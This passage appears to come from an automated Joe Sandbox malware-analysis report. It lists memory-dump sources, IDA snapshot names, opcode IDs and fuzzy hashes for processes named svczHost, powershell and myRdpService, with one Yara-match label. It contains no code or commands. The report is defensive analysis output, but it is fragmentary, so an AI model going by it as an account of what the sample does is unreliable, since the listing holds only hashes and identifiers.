                                                                                                              • Associated: 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4408300872.00007FF6619D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4408300872.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4409009429.00007FF661BE5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4409042520.00007FF661BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4409042520.00007FF661BFF000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4409042520.00007FF661C02000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4409042520.00007FF661C04000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000010.00000002.4409193534.00007FF661C07000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ff6612d0000_svczHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2933794660-0
                                                                                                              • Opcode ID: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                                              • Instruction ID: 80bdc72e1ed47d3f5730114e6cba6e325cd47faa380a08f883d5c2ec6a51854a
                                                                                                              • Opcode Fuzzy Hash: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                                              • Instruction Fuzzy Hash: 58111F26B14B06CAEB00CB60E8942B833B4FB19B58F441A35DA6D86754DF78D5548340
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3735506170.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd23f09d8d725cc08c90156104e5fa38d7a688c31b54efffbf6ef39d4bb99abf
                                                                                                              • Instruction ID: f4178b5ea623ab43ef8bc42f788ea4c92af72aaf3b4e03612e72f98f9a32734f
                                                                                                              • Opcode Fuzzy Hash: bd23f09d8d725cc08c90156104e5fa38d7a688c31b54efffbf6ef39d4bb99abf
                                                                                                              • Instruction Fuzzy Hash: 6FF1C13190CA8D8FEBA9EF28C8557E937D2FF54300F04466AD84DC7291DB39A941CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3735506170.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 300a727b0ed98f02178d690f0b0a270bacf2be4ea2532453f0d1a156474390d9
                                                                                                              • Instruction ID: bfb4db7e94eaa9782d095bae78ca969c7a1f1f7e59ffc94eb0e057c6775e9b69
                                                                                                              • Opcode Fuzzy Hash: 300a727b0ed98f02178d690f0b0a270bacf2be4ea2532453f0d1a156474390d9
                                                                                                              • Instruction Fuzzy Hash: C2E1E43060CA4D4FEBA9EF28C8557E937D2FF54310F04466ED84DCB291DA79A840C792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3735506170.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 56737cb028e8fd68eb02b1317ce493ca34ae32aa785dd04e396f66ccc5bf21f5
                                                                                                              • Instruction ID: f9f4df81618830652f5c4b3e47db9ebf61ef45c87ff597e49e9adb9ea086609b
                                                                                                              • Opcode Fuzzy Hash: 56737cb028e8fd68eb02b1317ce493ca34ae32aa785dd04e396f66ccc5bf21f5
                                                                                                              • Instruction Fuzzy Hash: BBB1E33060CA4D4FEBA9EF28C8557E93BD1FF55310F04466EE44DCB292DA35A845CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3735506170.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 63e8f23bbcb5e9d6d9dc5d258416229ce70471dca04d36715189d465f4d2cbbe
                                                                                                              • Instruction ID: f60f19f5a56adf1ba792b4acbc8c5ccfaab46992bf006575964e8dbb0f7af7f4
                                                                                                              • Opcode Fuzzy Hash: 63e8f23bbcb5e9d6d9dc5d258416229ce70471dca04d36715189d465f4d2cbbe
                                                                                                              • Instruction Fuzzy Hash: 6631303181D5AE8EFBB5AF18CC15BF832E1FF45719F402939D40D8A092DA7D6945CB21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3735506170.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                              • Instruction ID: a5dfccf9ae7a079b3505353d94364bfb0fcc09479b290ea61748931fde64329c
                                                                                                              • Opcode Fuzzy Hash: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                              • Instruction Fuzzy Hash: 1401677111CB0C8FDB44EF0CE451AA5B7E0FB95324F10056DE58AC76A1DA36E892CB45
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: 64416d30016fe13e803c818f216a1e05009821475f11aaa9eefa659b1e77aa52
                                                                                                              • Instruction ID: e9030acbc28909f04d7ef3cd47c983f9493398c4ec42e8391f3647c82a187012
                                                                                                              • Opcode Fuzzy Hash: 64416d30016fe13e803c818f216a1e05009821475f11aaa9eefa659b1e77aa52
                                                                                                              • Instruction Fuzzy Hash: E2513A3290D6AD4FD71AEA2CA8416F57BD1EF45731F0406BDC4598F1D2CE26A416C3A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: d02d2ac0fc4efd67abd58d6596b26d2143872b27e45fa07355bfd495742f6e1b
                                                                                                              • Instruction ID: 6d7d5e5f0818f491be151f7fac7752a00e9e3d4261107c2ee20ad9bcff6bc766
                                                                                                              • Opcode Fuzzy Hash: d02d2ac0fc4efd67abd58d6596b26d2143872b27e45fa07355bfd495742f6e1b
                                                                                                              • Instruction Fuzzy Hash: DD417C26E0C6ED4FEB56E62C58517FD7BD2EF52720F0806BDC4994F1C2CA2A6406C3A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: a003be2b4489bbb426bea22c0b2818ed9515ea866c25ec913f20047c1969945d
                                                                                                              • Instruction ID: f458cbd6c58b00a0c04a9a0e1dfe397b454a169b64118bd1c3daf7042f5b5065
                                                                                                              • Opcode Fuzzy Hash: a003be2b4489bbb426bea22c0b2818ed9515ea866c25ec913f20047c1969945d
                                                                                                              • Instruction Fuzzy Hash: 79312936E0C6AD4BEB5AEA1C98913FD77D2EF41724F18067CC49A4F1C2CE2A6406C351
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: a83dd1b35adcd19d82bb3d9ff41d481dcb8d7ea649db948181e5029761904c5e
                                                                                                              • Instruction ID: 8171b8c44edc0a06dbf8185cc7048acea8adfdd7cb41a81a9be6cf07ee416cf8
                                                                                                              • Opcode Fuzzy Hash: a83dd1b35adcd19d82bb3d9ff41d481dcb8d7ea649db948181e5029761904c5e
                                                                                                              • Instruction Fuzzy Hash: F5212726E0C6AD4AEB5AEA1CA8813FC77D2EF51724F08077CC49A4F1C2CE2A6516C351
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c5c33f000cbf892dafaf52436c535315b303e48f8adf1dbf4040c23a0279c4cb
                                                                                                              • Instruction ID: cc1ee691f2f2767443bcff4f3d3ec1a9457143373cdce643652e6cdd1774c7ae
                                                                                                              • Opcode Fuzzy Hash: c5c33f000cbf892dafaf52436c535315b303e48f8adf1dbf4040c23a0279c4cb
                                                                                                              • Instruction Fuzzy Hash: 10715D6390EACA4FFB2AD65C6C152B93BF1EF56B10B0404BFD049C7197D9255D0AC3A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be7d80768d7cdcd540d50867486a9afcc6d9946ea276f588a141e3396c30b75e
                                                                                                              • Instruction ID: a74b6696d10d1c13e3418731dda3ab096d33d14c9ab9b2492ca4e827592b29d7
                                                                                                              • Opcode Fuzzy Hash: be7d80768d7cdcd540d50867486a9afcc6d9946ea276f588a141e3396c30b75e
                                                                                                              • Instruction Fuzzy Hash: BE513922A0DBDE4FEB56E62C98657EA7BA1EF16710F0405B7D049CB0D3DD25AC05C362
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ea38707a248b9fd654f0035eb33c742dea5dcd2faf1a6adf186c8a46da306c0f
                                                                                                              • Instruction ID: 22c76742b57fd7e6f0f77ee9f662e99655b2d509dac573ec9a134f46559a5403
                                                                                                              • Opcode Fuzzy Hash: ea38707a248b9fd654f0035eb33c742dea5dcd2faf1a6adf186c8a46da306c0f
                                                                                                              • Instruction Fuzzy Hash: A461C43190CA2C8FDB69EF18D8457E9B7F1FF58310F0046AAD04EE7251DA74A985CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 95745e2e82379eb528423c59770cc3c00f5be2461e7f919ca3fcd00d8cfcec3b
                                                                                                              • Instruction ID: c9b98699af22a9c45ccdfd510ef67759e3aac59bb5802196d7b594f7743be989
                                                                                                              • Opcode Fuzzy Hash: 95745e2e82379eb528423c59770cc3c00f5be2461e7f919ca3fcd00d8cfcec3b
                                                                                                              • Instruction Fuzzy Hash: 2F419E32A1C92D4BDB9AF62C94556EDB3E2EF68700F0049B9D00EC7682DE24B945CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ebe15e801c8ea5d10644bc093b7b08d9b7b780794048b5712ffd435e34eafa06
                                                                                                              • Instruction ID: 4a0476d5fb90e865a9c875d796a1426198e20e19f27a50ce48562c003269e636
                                                                                                              • Opcode Fuzzy Hash: ebe15e801c8ea5d10644bc093b7b08d9b7b780794048b5712ffd435e34eafa06
                                                                                                              • Instruction Fuzzy Hash: C041C53290CA5D8EEB69EB48D8807FDB7F1FF58710F00466AD00E97251DA79A946CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1ebf855e290fcb18dc770cb39b81f07df1d9197ca06c158e67b39f0cc2b7ddbc
                                                                                                              • Instruction ID: 5dd8b741c1ce3c3b08bd115a34998575d05c799f92473c3a742df1ffbe25beeb
                                                                                                              • Opcode Fuzzy Hash: 1ebf855e290fcb18dc770cb39b81f07df1d9197ca06c158e67b39f0cc2b7ddbc
                                                                                                              • Instruction Fuzzy Hash: CF41613190CA5D8FDF59EB48D880BE9B3B1FF64310F008699D04EA7255DE74AA89CF81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93146b6e04c8894362137e2a245793bb82e851b910e459352712ea9f507465aa
                                                                                                              • Instruction ID: 9da530cb11d5f26d15a132c71d2bd3d0ee3aab8d4d75a4b95902234da14acdd2
                                                                                                              • Opcode Fuzzy Hash: 93146b6e04c8894362137e2a245793bb82e851b910e459352712ea9f507465aa
                                                                                                              • Instruction Fuzzy Hash: DD31B13160C7998FD791EB7CC4487A6BBE1EB99310F140E7AE088C7292EB64D881C752
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9268a680fee0c1cc9ab17c5d5f91ab2b82bc11c6cd595c20419f27522edf807
                                                                                                              • Instruction ID: 8ee6592ff2241729b31e9ddd501ccc3eadde005ede8e2d5557236f52a215e8e1
                                                                                                              • Opcode Fuzzy Hash: f9268a680fee0c1cc9ab17c5d5f91ab2b82bc11c6cd595c20419f27522edf807
                                                                                                              • Instruction Fuzzy Hash: E811C631A0C65D8FD750FA78C848AA7B7E2EB99350F104F3AD049C3261EE74E880C791
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
                                                                                                              • Instruction ID: 66dac8ba205f24db29b236727985d3be1bab536d7f5670609f1001d4b675d51e
                                                                                                              • Opcode Fuzzy Hash: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
                                                                                                              • Instruction Fuzzy Hash: 6401043190C51E4BEBAAFA78C815BBE76F2EF54710F10153DE04B975C2CE292840C7A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                              • Instruction ID: a5dfccf9ae7a079b3505353d94364bfb0fcc09479b290ea61748931fde64329c
                                                                                                              • Opcode Fuzzy Hash: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                              • Instruction Fuzzy Hash: 1401677111CB0C8FDB44EF0CE451AA5B7E0FB95324F10056DE58AC76A1DA36E892CB45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a6f4183cd9019ed7845bf587ce5d6e7a6968f9a0e1f369773f3c83a5d0f56cd4
                                                                                                              • Instruction ID: 922522e45ff2402dbd76f6c6f60705fc73812489dadf8913d3a77578bb9af4fd
                                                                                                              • Opcode Fuzzy Hash: a6f4183cd9019ed7845bf587ce5d6e7a6968f9a0e1f369773f3c83a5d0f56cd4
                                                                                                              • Instruction Fuzzy Hash: BAD05E21B5992E47DB55BB64A0A60EEB2A1EF54300B101D74D40BCA0CAEE28BD46C7A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a234b450eec39534350c985adde57d8bbb68dcdd2ef5c5e976c34d368a6dab4
                                                                                                              • Instruction ID: 2d110720530d482589f3bee6076fc2a5b5abb9220dd6eb5595d132ab54b8a284
                                                                                                              • Opcode Fuzzy Hash: 6a234b450eec39534350c985adde57d8bbb68dcdd2ef5c5e976c34d368a6dab4
                                                                                                              • Instruction Fuzzy Hash: 9FB0928380E7C20ED6664D1808101612A615A37A0031A20A6C0458B29B98588E0A8326
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.3733768024.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0}E$8}E$@}E$P}E$X}E$`}E$h}E$x}E$}E$}E
                                                                                                              • API String ID: 0-1513718135
                                                                                                              • Opcode ID: 0bebce67b4a7b46a9379cb4e297696e5ebad3a8ca8e868540eb1ea13610fb2cd
                                                                                                              • Instruction ID: ffd5bd4e8581481a745a7933422aceced42621f2ab2b1db7c4eb747b63276640
                                                                                                              • Opcode Fuzzy Hash: 0bebce67b4a7b46a9379cb4e297696e5ebad3a8ca8e868540eb1ea13610fb2cd
                                                                                                              • Instruction Fuzzy Hash: 2D811A4360F5E706FB23A16CBC552F9BF62DF9272071815F7D0888B0DBAC15590AC3A6
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000029.00000002.4403471586.00007FF63B7A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF63B7A0000, based on PE: true
                                                                                                              • Associated: 00000029.00000002.4403418516.00007FF63B7A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4404534772.00007FF63BCA6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4404925157.00007FF63BE68000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4404925157.00007FF63BFAA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4405764528.00007FF63C200000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4405822982.00007FF63C202000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4405822982.00007FF63C20C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4405822982.00007FF63C21E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4405822982.00007FF63C220000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4405822982.00007FF63C223000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4405822982.00007FF63C225000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000029.00000002.4406117167.00007FF63C228000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_41_2_7ff63b7a0000_myRdpService.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2933794660-0
                                                                                                              • Opcode ID: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                                              • Instruction ID: 67d9bccd0558cec555930b3fd19341f6196bcd310c595b2ec13dbc26300454a7
                                                                                                              • Opcode Fuzzy Hash: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                                              • Instruction Fuzzy Hash: 19113C22B54F058AEB00CF64E8542B933A4FB19759F441E32EFAD867A4DF78D1949340
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000002F.00000002.4394867913.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_47_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                              • Instruction ID: a5dfccf9ae7a079b3505353d94364bfb0fcc09479b290ea61748931fde64329c
                                                                                                              • Opcode Fuzzy Hash: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                              • Instruction Fuzzy Hash: 1401677111CB0C8FDB44EF0CE451AA5B7E0FB95324F10056DE58AC76A1DA36E892CB45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000033.00000002.4242982941.00007FFC455D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC455D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_51_2_7ffc455d0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f10f313324ffe44f71691142262ff219a3261711af9c347077e4bbe2ed12bfda
                                                                                                              • Instruction ID: 93b1b34a67a4a5c62a19e608b19c24f633e89837c4637a43c5c5a597aad254a3
                                                                                                              • Opcode Fuzzy Hash: f10f313324ffe44f71691142262ff219a3261711af9c347077e4bbe2ed12bfda
                                                                                                              • Instruction Fuzzy Hash: 2C816832E0DAAD8FDB91EB28A8546B53BE1FF59300F0445BBD41DC30A3EA14E849C761
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000033.00000002.4238279101.00007FFC45500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_51_2_7ffc45500000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 390b43d0d27606fcc6d81820381354590e1f2259c2c4aab3fcf2d16506637991
                                                                                                              • Instruction ID: 7a0ce22ccd50bd10f20dde5815685fc820ab017cc71fc4e458bfc79885679b5e
                                                                                                              • Opcode Fuzzy Hash: 390b43d0d27606fcc6d81820381354590e1f2259c2c4aab3fcf2d16506637991
                                                                                                              • Instruction Fuzzy Hash: B001677111CB0C8FDB84EF0CE491AB5B7E0FB95324F10056DE58AC76A1D636E882CB45
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000033.00000002.4238279101.00007FFC45500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_51_2_7ffc45500000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8dnE$8dnE$Fn_H$Gn_H$`nE$`nE
                                                                                                              • API String ID: 0-3101209031
                                                                                                              • Opcode ID: 8f52def7f3c7ed25de0f64705771b70fd54603e123b69a93d033625eeabd0fa4
                                                                                                              • Instruction ID: e379a20161e00050c44822f0a3e370a88958d550f082257087a8b7c140fe437f
                                                                                                              • Opcode Fuzzy Hash: 8f52def7f3c7ed25de0f64705771b70fd54603e123b69a93d033625eeabd0fa4
                                                                                                              • Instruction Fuzzy Hash: 67512825B0ED9E4FDBD1E62CA8986B877E1FF6961070405BAD45EC72A2DD18DC03C721